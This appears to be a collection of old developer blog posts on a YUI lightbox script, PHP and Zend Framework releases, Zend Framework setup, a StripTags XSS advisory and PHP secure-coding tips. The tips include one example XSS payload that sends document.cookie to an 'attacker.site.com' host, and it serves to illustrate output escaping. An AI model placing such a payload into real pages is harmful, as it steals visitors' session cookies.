SimpleDialog extends Dialog and behaves like an operating system dialog (modal or non-modal). The look and feel of a SimpleDialog instance is similar to that of a Panel, but with SimpleDialog the user responds to a question with a single answer - OK/Cancel, Yes/No, and so on. Event handlers are attached to the buttons in a SimpleDialog instance to enable your script to respond to whatever choice the user has made.

To be as unobtrusive as possible I decided to use the Bubbling library, created by Caridy Patino.

Javascript Bubbling Library is a set of plugins, behaviors and widgets, for building event-driven web applications using the bubble-up technique. The Bubbling Library also includes several plugins that can be used to extend the YUI Library to manage dynamic areas which are closely related with the event-driven philosophy. All components in the Bubbling Library have been released as open source under a BSD license and are free for all uses.

The Simple Lightbox code is under 4K uncompressed and less than 2.5K compressed. There are some basic requirements, HTML code wise, to allow thumbnail images to be gathered and displayed on a page. They very basic though and should be easy enough to implement on your own pages. In order for Simple Lightbox to use display your thumbnails you will need to have them wrapped with A tags with HREF attribute values linking to the larger image. These links also need to have a class value of “slbLink” so that they can be identified by the Bubbling library. Visitors without Javascript support will still be able to view the larger images so this degrades rather nicely. If the thumbnail image has an ALT attribute it will be used as the header for the large image display.

<a href=”/path/to/larger/image.jpg” class=”slbLink”>
<img src=”/path/to/smaller/image.jpg” alt=”the big picture” />
</a>

Here is a small demonstration:

And here is the code:

<script type="text/javascript">
/*
Copyright (c) 2009, Dave Lozier
Code licensed under the BSD License:
http://davelozier.com/bsd/license.txt
version: 1.0
*/
YAHOO.namespace("simpleLightbox");
var myLightbox = function () {
	var Event = YAHOO.util.Event, Dom = YAHOO.util.Dom, currentThumb, slbActive = false, slbDisplay;
	var slblinks = Dom.getElementsByClassName('slbLink', 'a');

	var fadeIn = function() {
		var ani = new YAHOO.util.Anim(slbDisplay , { opacity: {from: 0, to: 1 } }, .5, YAHOO.util.Easing.easeOut);
		ani.animate();
	}

	var showImage = function (obj,header) {
		var vpw = Dom.getViewportWidth() - 50;
		var vph = Dom.getViewportHeight() - 100;
		if (obj.width > vpw || obj.height > vph){
			var objRatio = obj.width / obj.height;
			var vpRatio = vpw / vph;
			if (objRatio <= vpRatio) {
				obj.height = vph;
				obj.width = obj.width * (vph / obj.height);
			} else {
				obj.width = vpw;
				obj.height = obj.height * (vpw / obj.width);
			}
		}
		YAHOO.simpleLightbox.photoViewer.cfg.setProperty('width', (obj.width + 20)  + 'px');
		YAHOO.simpleLightbox.photoViewer.setHeader(unescape(header));
		Dom.setStyle(slbDisplay,'width', obj.width+'px');
		Dom.setStyle(slbDisplay,'height', obj.height+'px');
		Dom.setStyle(slbDisplay,'background', 'url('+obj.src+') no-repeat');
		YAHOO.simpleLightbox.photoViewer.center();
		if (slbActive == false) {
			slbActive = true;
			YAHOO.util.Dom.setStyle(slbDisplay, 'opacity', '1');
			YAHOO.simpleLightbox.photoViewer.show();
		} else {
			fadeIn();
		}
	}

	var fadeOut = function(obj,header) {
		if (slbActive == true) {
			var ani = new YAHOO.util.Anim(slbDisplay , { opacity: {from: 1, to: 0 } }, .5, YAHOO.util.Easing.easeOut);
			ani.animate();
			ani.onComplete.subscribe(function(){showImage(obj,header)});
		} else {
			showImage(obj,header);
		}
	}

	var loadImage = function(el) {
		if (el.src && el.src != '') {
			currentThumb = el.src;
			var imageSrc = el.parentNode.href;
			var header = (el.alt != null) ? el.alt : '';
			var objImage = new Image();
			Event.on(objImage, 'load', function(){fadeOut(objImage,header);});
			objImage.src = imageSrc;
		}
	}

	var prevThumb = function() {
		for (i=0; i<slblinks.length; i++) {
			if (slblinks[i].firstChild.src == currentThumb) {
				if (i == 0) {
					i = slblinks.length-1;
				} else {
					i = i - 1;
				}
				loadImage(slblinks[i].firstChild);
				break;
			}
		}
	}

	var nextThumb = function() {
		for (i=0; i<slblinks.length; i++) {
			if (slblinks[i].firstChild.src == currentThumb) {
				if (i == slblinks.length-1) {
					i = 0;
				} else {
					i = i + 1;
				}
				loadImage(slblinks[i].firstChild);
				break;
			}
		}
	}

	var hideMe = function() {
		slbActive = false;
		this.hide();
	}

	YAHOO.simpleLightbox.photoViewer = new YAHOO.widget.SimpleDialog("photoViewer",{
		width: "300px",
		fixedcenter: true,
		visible: false,
		draggable: false,
		close: false,
		modal: true,
		text: '<div id="slbDisplay"></div>',
		constraintoviewport: true,
		effect: [ {effect:YAHOO.widget.ContainerEffect.FADE,duration:0.5} ],
		buttons: [ { text:"Prev", handler:prevThumb },{ text:"Next", handler:nextThumb },{ text:"Close", handler:hideMe, isDefault:true } ]
	});

	YAHOO.simpleLightbox.photoViewer.setHeader('Simple Lightbox');
	YAHOO.simpleLightbox.photoViewer.render("container");
	slbDisplay = Dom.get('slbDisplay');

	YAHOO.Bubbling.addDefaultAction('slbLink',
		function (layer, args) {
			loadImage(args[1].target);
			return true;
		}
	);
}
YAHOO.util.Event.addListener(window, "load", myLightbox);
</script>

View this demo on a new page or download the demo and use on your own pages. Enjoy!

The PHP development team is proud to announce the immediate release of PHP 5.3.0. This release is a major improvement in the 5.X series, which includes a large number of new features and bug fixes.

Some of the key new features include: namespaces, late static binding, closures, optional garbage collection for cyclic references, new extensions (like ext/phar, ext/intl and ext/fileinfo), over 140 bug fixes and much more.

For users upgrading from PHP 5.2 there is a migration guide available here, detailing the changes between those releases and PHP 5.3.0.

Further details about the PHP 5.3.0 release can be found in the release announcement, and the full list of changes are available in the ChangeLog.

Ardilla is an automated tool that generates concrete attack vectors for Web applications written in PHP,” the researchers say. “The user of Ardilla needs to specify the type of attack (SQLI, first order XSS, or second-order XSS), the PHP program to analyze, and the initial database state.

Read more about this here:
PHP XSS and SQL Exploit Testing

The Zend Framework team is pleased to announce the immediate
availability of the 1.8.2 release. This release is the second
maintenance release in the 1.8 series.  Fixes for this release focus on
Zend_Db and autoloading improvements. In all, over 50 issues were closed
for the release.

With the introduction of Zend_Loader_Autoloader in 1.8.0, a number of
issues related to autoloading could finally be closed. All cases where
Zend_Loader::loadClass() was hard-coded into the framework were modified
to check for class_exists() first, to trigger the autoloader. This
should make writing custom adapters and plugins an easier task.

For a full list of closed issues, you can visit:
http://framework.zend.com/changelog/1.8.2

http://framework.zend.com/download/latest

Over 200 bug and feature fixes have been added for this minor
release!

Here is list of the primary feature additions for Zend Framework 1.8.0:

• Zend_Tool, contributed by Ralph Schindler
• Zend_Application, contributed by Ben Scholzen and Matthew Weier O’Phinney
• Zend_Loader_Autoloader and Zend_Loader_Autoloader_Resource, contributed by Matthew Weier O’Phinney
• Zend_Navigation, contributed by Robin Skoglund
• Zend_CodeGenerator, by Ralph Schindler
• Zend_Reflection, Ralph Schindler and Matthew Weier O’Phinney
• Zend Server backend for Zend_Cache, contributed by Alexander Veremyev
• Zend_Service_Amazon_Ec2, contributed by Jon Whitcraft
• Zend_Service_Amazon_S3, Justin Plock and Stas Malyshev
• Incorporated Dojo 1.3
• Added support for arbitrary Dojo Dijits via view helpers
• Zend_Filter_Encrypt, contributed by Thomas Weidner
• Zend_Filter_Decrypt, contributed by Thomas Weidner
• Zend_Filter_LocalizedToNormalized and _NormalizedToLocalized, contributed by Thomas Weidner
• Support for file upload progress support in Zend_File_Transfer, contributed by Thomas Weidner
• Translation-aware routes, contributed by Ben Scholzen
• Route chaining capabilities, contributed by Ben Scholzen
• Zend_Json expression support, contributed by Benjamin Eberlei and Oscar Reales
• Zend_Http_Client_Adapter_Curl, contributed by Benjamin Eberlei
• SOAP input and output header support, contributed by Alexander Veremyev
• Support for keyword field search using query strings, contributed by Alexander Veremyev
• Support for searching across multiple indexes in Zend_Search_Lucene, contributed by Alexander Veremyev
• Significant improvements for Zend_Search_Lucene search result match highlighting capabilities, contributed by Alexander Veremyev
• Support for page scaling, shifting and skewing in Zend_Pdf, contributed by Alexander Veremyev
• Zend_Tag_Cloud, contributed by Ben Scholzen
• Locale support in Zend_Validate_Int and Zend_Validate_Float, contributed by Thomas Weidner
• Phonecode support in Zend_Locale, contributed by Thomas Weidner
• Zend_Validate_Db_RecordExists and _RecordNotExists, contributed by Ryan Mauger
• Zend_Validate_Iban, contributed by Thomas Weidner
• Zend_Validate_File_WordCount, contributed by Thomas Weidner

I’m looking forward to using this right away! How soon will you be digging in?

mysql -u root -p

MySQL will prompt for the root password. Once your logged on you can issue the following command:

CREATE DATABASE databasename;

Next we need to give a user access to the new database:

GRANT INSERT, DELETE, UPDATE, SELECT
ON databasename.*
TO ‘username’@'localhost’ IDENTIFIED BY ‘password’;

Where ‘databasename’ is the name of the database we created, ‘username’ is the account allowed to access this database, ‘localhost’ is the host this user is allowed to connect from, ‘password’ is the password required for this user.

To activate the new permissions, issue the following command:

FLUSH PRIVILEGES;

The MVC portion of the framework is where we create the code needed for our application. The model part contains the bulk of the business-logic code. Tasks such as retrieving and storing data in a database are done by the model. Zend Framework provides the Zend_Db_Table component for easy table-level interaction with the database. Other components that make developing the model portion of MVC easy are provided by Zend_Service. The View is the display logic. This is where the templates containing HTML code for your website is displayed. The controller contains the rest of the code that makes up the application.

To get started, we’ll download the latest Zend Framework release. Zend Framework assumes that the library directory is available in the php_include path. I prefer to store ZF outside of this to keep environments isolated from one another. (eg. /var/www/example.com/library) We’ll also need to add some rewrite rules to our httpd.conf file. If your running Ubuntu or other Debian derivative it should be located at /etc/apache2/httpd.conf

<Directory /var/www/example.com/public>
RewriteEngine on
RewriteRule !^.*\..*$ /index.php
</Directory>

What this rule is saying is that if the request does not contain a dot . send it to our controller. This will allow any static file request to bypass the controller and be delivered up by the web server directly.  There are other rules that could be used here such as checking if %{REQUEST_FILENAME} exists, is a directory or is a link with a rewrite condition then proceeding to the rewrite rule if none of these conditions apply. To me this seems a bit excessive as more CPU and I/O time will be spent on each request to validate these conditions.

Next we need to create our bootstrap file.  This file initializes and configures our application. This will be the only PHP file needed in our public directory so it is often named index.php.

<?php
error_reporting(0);
date_default_timezone_set('America/Chicago');
define('ROOT_DIR','/var/www/example.com/');
set_include_path(ROOT_DIR . '/library' . PATH_SEPARATOR . get_include_path());
require_once 'Zend/Loader.php';
Zend_Loader::loadClass('Zend_Controller_Front');// set up the front controller
$frontController = Zend_Controller_Front::getInstance();
$frontController->setControllerDirectory(ROOT_DIR . '/application/controllers');
$frontController->dispatch();

With Zend Framework’s front controller, the dispatcher expects to find a file called IndexController.php in the /var/www/example.com/application/controllers directory.

<?php
class IndexController extends Zend_Controller_Action
{
    public function indexAction()
    {
        $this->view->assign('title','Hello World!');
    }
}

The indexAction() function assigns the ‘title’ varaible to the view property by the action helper Zend_Controller_Action_ViewRenderer. The ViewRenderer looks in the /var/www/example.com/application/views/scripts directory for a template file named after the action with a .phtml extension, within a folder named after the controller. This means it will look for /var/www/example.com/application/views/scripts/index/index.phtml

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>
<?php echo $this->escape($this->title); ?>
</title>
</head>
<body>
<h1>
<?php echo $this->escape($this->title); ?>
</h1>
</body>
</html>

The helper function escape() ensures that output is HTML safe. That is, it helps secure your site from XSS (cross site scripting) attacks. You should now be able to load up your example.com site and be greeted with Hello World! via the Zend Framework.

The Zend Framework team was recently notified of an XSS attack vector in its Zend_Filter_StripTags class. Zend_Filter_StripTags offers the ability to strip HTML tags from text, but also to selectively choose which tags and specific attributes of those tags to keep. The XSS attack vector was due to a bug in matching HTML tag attributes to retain. If whitespace was introduced surrounding the attribute assignment operator or the value included newline characters, the attribute would always be included in the final output- even if it was not marked to retain. A security fix has been created and released with Zend Framework 1.7.7. Additionally, the fix has been back-ported to the 1.6, 1.5, and 1.0 release branches. The Zend Framework team strongly recommends upgrading to version 1.7.7. If you cannot upgrade at this time, we recommend exporting from the release branch matching the minor release you are currently using, or downloading the file listed below and pushing it into your Zend Framework installation.

http://framework.zend.com/svn/framework/standard/branches/release-1.7/library/Zend/Filter/StripTags.php

Thank you. ,Wil

I’ve been digging into the Zend Framework lately and if you are looking to develop commercial sites quickly with a solid foundation I highly recommend doing so with the Zend Framework.

If your expecting numbers only you can use ctype_digit():

if (!ctype_digit($_POST['id'])) {

    exit("Numbers Only Please!");

}

There are other ctype_* functions for input validation such as ctype_alpha() for letters only and ctype_alnum() for leters and numbers only. PHP 5 also provides several filter functions to validate data with. If script is expecting an email address you can check that it is properly formatted in this manner:

if (!filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {

    exit("Valid Email Only Please!");

}

2. Filter your output! If you are storing data received from one of your users such as a forum post you need to make this data safe for displaying to other users. By using htmlspecialchars() or the more thorough htmlentities() functions you can avoid problems that come from embeded javascript, meta redirects and more.

Incoming text such as this:

Hello World! <script>document.write(’<img src=”http://attacker.site.com/getcookie.php?’+document.cookie+’” width=”1″ height=”1″ />’);</script>

Will be displayed exactly as shown above using PHP’s htmlentities():

$message = htmlentities($_POST['message'], ENT_QUOTES, 'UTF-8');

echo $message;

Of course filtering this data is best done prior to storing it in the database so that you do not have to filter it every time it is displayed there after.

3. Escape all database input! Before inserting information such as a forum post into your database make sure it is safe to do so. The *_escape_string() function available from the various PHP database drivers will prevent SQL injection attacks from being successful. For MySQL there is mysql_real_escape_string() or for PostgreSQL use pg_escape_string(). Simply using addslashes() may not be enough depending on the character set being used. SQL injection may still be possible with multi byte-characters. Another way to keep SQL injection attacks from being successful is to use prepared statements. PHP 5.1 and greater includes PHP Data Objects (PDO) which will not only use driver supplied prepared statement methods but also emulate them for those that do not. A prepared statement uses a “place holder” in your SQL statement for which an assigned value will be given after it has been safely escaped by PDO.

This is an example of a named place holder:

$query = "SELECT * FROM users WHERE username = :username AND password = :password";

$stmt = $dbh->prepare($query);

$stmt->execute(array(':username' => $_POST['username'], ':password' => $_POST['password']));

$row = $stmt->fetch(PDO::FETCH_ASSOC);

4. Turn off error reporting in your production environment! Displaying script errors on the page is an unsettling event for your users. Even worse, an error may expose information such as database credentials. You can configure PHP so that no errors are displayed on screen with the display_errors directive. You will still want to be able to see where errors are occurring and this can be accomplished by outputting the errors to your web server’s log file. In your php.ini file set the following:

display_errors = Off
log_errors = On

5. Use what’s there! This of course gets easier with time as you learn about all of the available functions that make coding with PHP easy and fun. The file_put_contents() function, for example, bypasses the need for you to fopen(), fwrite() and fclose() a file being stored on your website.

The independent and problem-solving type. They are especially attuned to the demands of the moment are masters of responding to challenges that arise spontaneously. They generally prefer to think things out for themselves and often avoid inter-personal conflicts.

The Mechanics enjoy working together with other independent and highly skilled people and often like seek fun and action both in their work and personal life. They enjoy adventure and risk such as in driving race cars or working as policemen and firefighters.

According to Typealyzer this is my brain on blog:

What type are you?